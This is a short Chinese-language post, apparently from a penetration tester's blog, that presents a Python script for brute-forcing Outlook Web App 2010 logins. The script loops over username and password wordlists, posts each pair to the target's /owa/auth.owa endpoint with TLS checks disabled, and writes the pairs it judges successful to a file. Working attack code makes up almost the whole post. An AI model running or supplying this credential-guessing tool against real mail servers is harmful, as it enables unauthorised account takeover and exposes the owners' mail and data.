owa_outlook暴力破解脚本
其实msf里面存在这样的模块,search owa 即可,字典这种东西还是找规律密码去破解比较好
然后担心遇到渗透测试没有msf情况下,还是得自己写个脚本,网上找了一下lijiejie,但是运行不了,于是我就改了一下。单线程版本,outlook2010版本,我是判断headers中是都存在owa版本,lijiejie脚本那样判断这里行不通,有空再写个
多线程版本吧
# coding:utf-8 import threading import requests import argparse import sys ''' 需要第一次访问获取session,加到data内容里面 ''' # parser = argparse.ArgumentParser(description='Microsoft OutLook WebAPP Brute Forcer.') # parser.add_argument('domain', type=str, help='website domain name, e.g. # email.baidu.com') # args = parser.parse_args() def open_file(path): wordlist = [] with open(path, 'r') as f: while True: word = f.readline().strip() if len(word) == 0: break wordlist.append(word) return wordlist users = open_file('user.txt') passwords = open_file('pass.txt') def get_session(domain): url = 'https://{url}/owa/auth/logon.aspx?replaceCurrent=1&url=https%3a%2f%2f{urls}%2fowa%2f'.format( url=domain, urls=domain) response = requests.get(url, verify=False, timeout=5) res = dict(response.headers) session = res['Set-Cookie'].split(';')[0] return session def brute_outlook(domain): headers = { 'Host': domain, 'Connection': 'Keep-Alive', 'Cache-Control': 'no-cache', 'Origin': 'https://{}'.format(domain), 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36', 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Referer': 'https://{url}/owa/auth/logon.aspx?replaceCurrent=1&url=https://{urls}/owa/'.format(url=domain, urls=domain), 'Accept-Encoding': 'gzip, deflate, br', 'Accept-Language': 'en-US,en;q=0.8,ru;q=0.6', 'Cookie': '' } for user in users: for pwd in passwords: while True: try: session = get_session(domain) break except: print('error happened !!!#1') headers2 = headers headers2['Cookie'] = 'OutlookSession={}; PBack=0'.format(session) data = {'destination': 'https://{}/owa/'.format(domain), 'flags': '0', 'forcedownlevel': '0', 'trusted': '0', 'username': user, 'password': pwd, 'isUtf8': '1' } while True: try: target = 'https://' + domain + '/owa/auth.owa' response = requests.post( target, data=data, headers=headers2, verify=False, timeout=7) if dict(response.headers)['X-OWA-Version']: print('crack success'+'-----'+ user+':'+pwd) with open('crack_email.txt','a') as f: f.write(user+'--------'+ pwd+ '\n') break except: print('error opened #2') if __name__ == '__main__': if len(sys.argv) <2: print('python brute.py url') exit(0) domain = sys.argv[1] brute_outlook(domain)